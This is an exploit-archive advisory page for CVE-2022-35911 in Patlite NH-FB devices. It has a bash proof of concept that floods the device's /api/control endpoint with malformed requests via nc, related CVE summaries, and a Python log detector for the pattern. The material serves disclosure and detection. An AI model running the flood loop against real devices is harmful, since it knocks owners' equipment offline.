Patlite 1.46 Buffer Overflow

Patlite versions 1.45 and below suffer from a buffer overflow vulnerability.

Packet Storm
#vulnerability#ubuntu#buffer_overflow#auth
```bash
#!/bin/bash
# Exploit Title: CVE-2022-35911 - Patlite Overflow.
# Date: 2022-07-07
# Exploit Author: Samy Younsi - Necrum Security Labs
# Vendor Homepage: https://www.patlite.co.jp
# Software Link: https://www.patlite.co.jp/product/detail0000021462.html
# Version: Versions 1.46 and below are affected
# Tested on: CentOS & Ubuntu
# CVE : CVE-2022-35911

IP="192.168.1.101"
PORT="80"

for i in {0..1000}; do
  echo "[$i]: "
  echo -ne "GET /api/control/AAAAAAAAAAAAAAAAAA HTTP/1.1\r\nHost: $IP\r\n\r\n" | nc "$IP" "$PORT"
done > /dev/null 2>&1
```

Related news

CVE-2022-38625: Patlite-NH-FB.md

Patlite NH-FB v1.46 and below was discovered to contain insufficient firmware validation during the upgrade firmware file upload process. This vulnerability allows authenticated attackers to create and upload their own custom-built firmware and inject malicious code.

CVE-2022-35911: PATLITE / IoT / Visualization | PATLITE

On Patlite NH-FB series devices through 1.46, remote attackers can cause a denial of service by omitting the query string.
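The proof of concept and the CVE-2022-35911 description both point at requests under `/api/control` that carry no query string. The following added example, which is not part of the original advisory or the vendor's code, flags sources that repeat such requests. It assumes access logs in combined format from a reverse proxy in front of the device; the log lines, addresses, query parameter and threshold are constructed.

```python
import re
from collections import Counter

# Constructed sample in Apache/nginx "combined" format (assumed log source:
# a reverse proxy in front of the device). Addresses are documentation ranges.
SAMPLE_LOG = """\
192.0.2.10 - - [07/Jul/2022:10:00:01 +0000] "GET /api/control?param=value HTTP/1.1" 200 12 "-" "curl/7.81.0"
198.51.100.7 - - [07/Jul/2022:10:00:02 +0000] "GET /api/control/AAAAAAAAAAAAAAAAAA HTTP/1.1" 502 0 "-" "-"
198.51.100.7 - - [07/Jul/2022:10:00:02 +0000] "GET /api/control/AAAAAAAAAAAAAAAAAA HTTP/1.1" 502 0 "-" "-"
192.0.2.10 - - [07/Jul/2022:10:00:03 +0000] "GET /api/control HTTP/1.1" 400 0 "-" "curl/7.81.0"
198.51.100.7 - - [07/Jul/2022:10:00:03 +0000] "GET /api/control/AAAAAAAAAAAAAAAAAA HTTP/1.1" 502 0 "-" "-"
not a log line at all
198.51.100.7 - - [07/Jul/2022:10:00:04 +0000] "GET /api/control/AAAAAAAAAAAAAAAAAA HTTP/1.1" 502 0 "-" "-"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" \d{3}')
CONTROL_PATH = "/api/control"


def is_suspect(target):
    """True for a request under /api/control with a missing or empty query string."""
    path, _, query = target.partition("?")
    on_control = path == CONTROL_PATH or path.startswith(CONTROL_PATH + "/")
    return on_control and not query


def find_sources(lines, threshold=3):
    """Return {source_ip: count} for sources with at least `threshold` suspect requests."""
    hits = Counter()
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed or truncated lines
        src, target = m.groups()
        if is_suspect(target):
            hits[src] += 1
    return {src: n for src, n in hits.items() if n >= threshold}


if __name__ == "__main__":
    for src, n in find_sources(SAMPLE_LOG.splitlines()).items():
        print(f"{src}: {n} query-less requests to {CONTROL_PATH}")
```

The threshold keeps a single malformed client request from alerting while still catching the looped pattern shown in the proof of concept.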
